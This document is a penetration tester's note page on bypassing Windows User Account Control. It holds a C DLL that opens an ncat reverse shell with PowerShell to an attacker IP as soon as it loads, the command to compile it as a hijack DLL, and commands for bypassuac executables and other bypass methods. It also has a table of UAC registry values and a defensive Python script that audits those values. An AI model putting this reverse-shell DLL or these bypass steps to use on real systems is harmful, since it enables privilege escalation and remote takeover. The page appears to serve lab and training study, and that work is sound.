# Bypass UAC

- A UAC bypass requires an administrator account.
- A UAC bypass is required if the shell gets "access denied" on administrator actions.
- Requires an interactive shell.
    - ncat does not work.
    - Use a Metasploit shell and attach to explorer or another process with a 1 (for interactive) in the `ps` list (seen after getting a Metasploit shell).
- Typically required for applications to launch a GUI.
- UAC bypasses
    - https://github.com/hfiref0x/UACME
    - `net use x: \\127.0.0.1\c$`
- Helpful post on understanding UAC settings
    - https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
UAC Bypass dll

```c
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        WinExec("C:\\Users\\batman\\nc.exe 10.10.14.141 7777 -e powershell", 0);
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return 0;
}
```

Compile with:

```
i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared
```

UAC registry values:

- EnableLUA
    - 0 = UAC enabled, no bypass needed, can PsExec to SYSTEM
    - 1 = UAC disabled, need to check the other 2 keys
- ConsentPromptBehaviorAdmin
    - Can take on 6 different values
- PromptOnSecureDesktop
    - Either 1 or 0
- If ConsentPromptBehaviorAdmin=2 & PromptOnSecureDesktop=1 then UAC bypass will not work
- If ConsentPromptBehaviorAdmin=5 & PromptOnSecureDesktop=1 then UAC bypass will work
## ConsentPromptBehaviorAdmin Values

| Value | Meaning |
|---|---|
| 0x00000000 | This option allows the Consent Admin to perform an operation that requires elevation without consent or credentials. |
| 0x00000001 | This option prompts the Consent Admin to enter his or her user name and password (or another valid admin) when an operation requires elevation of privilege. This operation occurs on the secure desktop. |
| 0x00000002 | This option prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task. This operation occurs on the secure desktop. |
| 0x00000003 | This option prompts the Consent Admin to enter his or her user name and password (or that of another valid admin) when an operation requires elevation of privilege. |
| 0x00000004 | This prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task. |
| 0x00000005 | This option is the default. It is used to prompt the administrator in Admin Approval Mode to select either "Permit" or "Deny" for an operation that requires elevation of privilege for any non-Windows binaries. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. This operation will happen on the secure desktop. |
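
A defender-side check built on the ConsentPromptBehaviorAdmin / PromptOnSecureDesktop rules and the value table above, as an added example that is not part of the original notes: it parses a saved `reg query` export and classifies the host using only the combinations this page gives. The registry path, the sample export (constructed), and the function names and verdict labels are assumptions; EnableLUA is carried through as a raw value only.

```python
import re

# Constructed sample in the layout printed by:
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    EnableLUA    REG_DWORD    0x1
    legalnoticecaption    REG_SZ
    PromptOnSecureDesktop    REG_DWORD    0x1
"""

DWORD_LINE = re.compile(r"^\s+(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")

def parse_reg_query(text):
    """Return {value_name: int} for every REG_DWORD line; other types are skipped."""
    values = {}
    for line in text.splitlines():
        m = DWORD_LINE.match(line)
        if m:
            values[m.group(1)] = int(m.group(2), 16)
    return values

def assess_uac(values):
    """Classify one host using only the rules and table on this page."""
    cpba = values.get("ConsentPromptBehaviorAdmin")
    posd = values.get("PromptOnSecureDesktop")
    if cpba is None or posd is None:
        return "unknown", "value missing from export; do not assume a default"
    if cpba not in range(6) or posd not in (0, 1):
        return "invalid", f"out-of-range data (CPBA={cpba:#x}, POSD={posd:#x})"
    if cpba == 2 and posd == 1:
        return "resistant", "the combination the page lists as not bypassable"
    if cpba == 0:
        return "no-prompt", "elevation happens without consent or credentials"
    if cpba == 5 and posd == 1:
        return "default", "the combination the page lists as bypassable"
    return "review", f"no rule on the page for CPBA={cpba}, POSD={posd}"

def audit(text):
    """Parse one export and return (verdict, reason, raw_values)."""
    values = parse_reg_query(text)
    verdict, reason = assess_uac(values)
    return verdict, reason, values

if __name__ == "__main__":
    verdict, reason, values = audit(SAMPLE)
    print(f"{verdict}: {reason} (EnableLUA raw value: {values.get('EnableLUA')})")
```

Hosts that come back as anything other than `resistant` are the ones to review against the table above.
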

## Eventvwr.exe UAC bypass

- Works on Windows 7, 8, and 10. Does not work on Vista.
- Guide: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
- Exploit in C (requires minimal editing) - https://github.com/turbo/zero2hero

## Pre-made UAC bypass executables on Kali

- bypassuac-x86.exe & bypassuac-x64.exe
- Same limitations as eventvwr.exe UAC bypass
- `bypassuac-x**.exe /c C:\directory\to\shell4444.exe`